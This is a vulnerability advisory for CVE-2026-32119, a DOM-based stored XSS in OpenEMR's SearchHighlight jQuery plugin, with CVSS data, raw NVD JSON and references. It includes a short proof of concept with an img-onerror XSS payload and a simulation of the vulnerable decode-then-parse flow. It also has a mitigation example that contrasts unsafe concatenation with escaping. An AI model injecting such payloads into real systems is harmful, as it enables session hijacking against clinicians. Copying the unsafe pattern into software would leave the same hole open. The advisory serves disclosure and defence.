Security Vulnerability Report
CVE-2026-32119 CVSS 4.4 MEDIUM

Published: 2026-03-19 20:16:14
Last Modified: 2026-03-20 16:20:15

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.2, DOM-based stored XSS in the jQuery SearchHighlight plugin (`library/js/SearchHighlight.js`) allows an authenticated user with encounter form write access to inject arbitrary JavaScript that executes in another clinician's browser session when they use the search/find feature on the Custom Report page. The plugin reverses server-side HTML entity encoding by reading decoded text from DOM text nodes, concatenating it into a raw HTML string, and passing it to jQuery's `$()` constructor for HTML parsing. Version 8.0.0.2 fixes the issue.

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE
OpenEMR < 8.0.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Step 1: Attacker injects payload into an encounter form field.
// The server stores this, typically HTML encoding it (e.g., < becomes &lt;).
var payload = "<img src=x onerror=alert('CVE-2026-32119')>";

// Step 2: Simulation of the vulnerable SearchHighlight.js logic
// when a victim uses the search feature on the Custom Report page.

// 1. The plugin reads the encoded text from the DOM.
// The browser decodes &lt; back to < when accessing .textContent.
var simulatedServerResponse = "&lt;img src=x onerror=alert('CVE-2026-32119')&gt;";
var tempDiv = document.createElement('div');
tempDiv.innerHTML = simulatedServerResponse;
var decodedText = tempDiv.textContent; // decodedText is now the raw malicious HTML string

// 2. The plugin concatenates the decoded text into an HTML string
// and passes it to jQuery $() for parsing/highlighting.
var vulnerableHtmlString = "<span class='highlight'>" + decodedText + "</span>";

// 3. jQuery parses the string as HTML; the injected element is created and its
// onerror handler runs in the victim's session.
$(vulnerableHtmlString).appendTo('body');
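The description above names the root cause: text that the server had entity-encoded is read back decoded from a DOM text node, concatenated into a markup string, and handed to an HTML parser. As an added example that is not OpenEMR's code and does not claim to be the project's actual fix, the following Node-runnable JavaScript models that string-building step beside a hardened variant that re-escapes the decoded text before the string is built. The function names, the `escapeHtml` helper, the fixed wrapper constants and the sample input are assumptions constructed for illustration.

```javascript
// Added example, not OpenEMR code: models the markup-building step the advisory
// describes (decoded DOM text concatenated into HTML) beside a hardened variant.
// All names and the sample input below are constructed for illustration.

// Re-encode the characters that change meaning inside HTML markup, so text that
// was decoded from a DOM text node cannot be re-parsed as tags or attributes.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')   // must run first so later entities are not double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const WRAP_OPEN = "<span class='highlight'>";
const WRAP_CLOSE = "</span>";

// Unsafe pattern: decoded text is dropped straight into a string that will be
// handed to an HTML parser (jQuery's $() in the original plugin).
function buildHighlightMarkupUnsafe(decodedText) {
  return WRAP_OPEN + decodedText + WRAP_CLOSE;
}

// Hardened pattern: the server's entity encoding is restored before the string is
// built, so the search hit can only ever render as literal text.
function buildHighlightMarkupSafe(decodedText) {
  return WRAP_OPEN + escapeHtml(decodedText) + WRAP_CLOSE;
}

// Checks whether the content between the wrapper tags could introduce an element
// of its own. A string check is enough here because the wrapper is fixed; in a
// page you would inspect the resulting DOM instead.
function introducesExtraTags(markup) {
  const inner = markup.slice(WRAP_OPEN.length, markup.length - WRAP_CLOSE.length);
  return /<[a-zA-Z!\/]/.test(inner);
}

// Constructed sample: what .textContent yields after the browser has decoded
// a server-encoded "&lt;img ...&gt;" field value.
const SAMPLE_DECODED_TEXT = "<img src=x onerror=alert(1)>";

// Builds both variants for the sample and reports whether each one lets the
// "text" smuggle in an element.
function demo() {
  const unsafe = buildHighlightMarkupUnsafe(SAMPLE_DECODED_TEXT);
  const safe = buildHighlightMarkupSafe(SAMPLE_DECODED_TEXT);
  return {
    unsafe,
    safe,
    unsafeIntroducesTags: introducesExtraTags(unsafe),
    safeIntroducesTags: introducesExtraTags(safe),
  };
}

console.log(demo());
```

Re-escaping is the string-level mitigation that keeps the original's concatenate-then-parse flow; in a real page the cleaner alternative is to never build HTML from text at all, for example by creating the wrapper element and setting its content with `document.createTextNode` or jQuery's `.text()`, so there is no parse step for the decoded value to reach.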

References

https://github.com/openemr/openemr/commit/70a41122c6d75ebcd219ba2a2535e93a6c188151 (Patch)
https://github.com/openemr/openemr/security/advisories/GHSA-q283-5j7f-r6hp (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32119", "sourceIdentifier": "[email protected]", "published": "2026-03-19T20:16:13.900", "lastModified": "2026-03-20T16:20:15.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.2, DOM-based stored XSS in the jQuery SearchHighlight plugin (`library/js/SearchHighlight.js`) allows an authenticated user with encounter form write access to inject arbitrary JavaScript that executes in another clinician's browser session when they use the search/find feature on the Custom Report page. The plugin reverses server-side HTML entity encoding by reading decoded text from DOM text nodes, concatenating it into a raw HTML string, and passing it to jQuery's `$()` constructor for HTML parsing. Version 8.0.0.2 fixes the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación de gestión de registros de salud electrónicos y práctica médica de código abierto y gratuita. Antes de la versión 8.0.0.2, un XSS almacenado basado en DOM en el plugin jQuery SearchHighlight ('library/js/SearchHighlight.js') permite a un usuario autenticado con acceso de escritura a formularios de encuentro inyectar JavaScript arbitrario que se ejecuta en la sesión del navegador de otro clínico cuando utilizan la función de búsqueda/encontrar en la página de Informes Personalizados. El plugin revierte la codificación de entidades HTML del lado del servidor leyendo texto decodificado de nodos de texto DOM, concatenándolo en una cadena HTML sin procesar y pasándolo al constructor `$()` de jQuery para el análisis HTML. La versión 8.0.0.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.2", "matchCriteriaId": "C78F19AD-BD18-4F61-8B1C-DD099DBC6D34"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/70a41122c6d75ebcd219ba2a2535e93a6c188151", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-q283-5j7f-r6hp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-q283-5j7f-r6hp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}